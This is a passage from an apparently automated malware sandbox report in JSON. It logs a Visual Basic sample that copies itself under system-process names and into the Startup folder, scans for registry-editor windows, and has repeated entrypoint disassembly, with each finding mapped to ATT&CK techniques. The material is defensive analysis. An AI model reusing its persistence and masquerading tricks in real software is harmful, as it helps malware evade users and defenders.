\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %WINDIR%\\D3_08.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location C:\\D3_08.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %WINDIR%\\system32\\MrD3_08.scr (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.scr to new location %WINDIR%\\D3_08.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.scr to new location C:\\D3_08.exe (UID: 00000000-00006008)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" called \"CopyFileA\" to copy C:\\\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00006008)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"D3_08.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for class \"RegEdit_RegEdit\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for window \"Registry Editor\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for window \"Folder Options\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for window \"Local Settings\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for class \"ExploreWClass\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for class \"CabinetWClass\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for class \"RebarWindow32\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for class \"ComboBoxEx32\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for class \"ComboBox\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for class \"Edit\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"services.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IExplorer.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Data HAPUBWS.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"Empty.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"New Folder.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SERVICES.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE4BB1.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"IEXPLORER.EXE.67EE4667.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SMSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"LSASS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"D3_08.EXE.67EE4665.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"MrD3_08.scr\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"WINLOGON.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"CSRSS.EXE\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"services.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IExplorer.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.exe.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Data HAPUBWS.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"Empty.pif\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"New Folder.exe\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"CSRSS.EXE.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SERVICES.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE4BB1.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"IEXPLORER.EXE.67EE4667.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"SMSS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"LSASS.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"D3_08.EXE.67EE4665.bin\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"MrD3_08.scr\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,sub\tdl, bl,sub\tecx, edi,sub\tdh, byte ptr [eax - 0x13],inc\tesi,adc\tah, 0x2a,pop\teax,or\tecx, dword ptr [eax],mov\tdword ptr [0xa0], eax,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebp + 0x5f], al,xor\tbyte ptr [eax], bh,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbh, bh,int3\t,xor\tdword ptr [eax], eax,add\tdword ptr [ebp + 0x67d0d83], ecx,mov\tdl, 0x66,dec\tebp,or\tbyte ptr [edi - 0x788b0d54], 0x77,int\t0x4b,sub\teax, dword ptr [0x24175689],\"\n \"WINLOGON.EXE\" file has an entrypoint instructions - \"push\t0x406770,call\t0x401fbe,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr 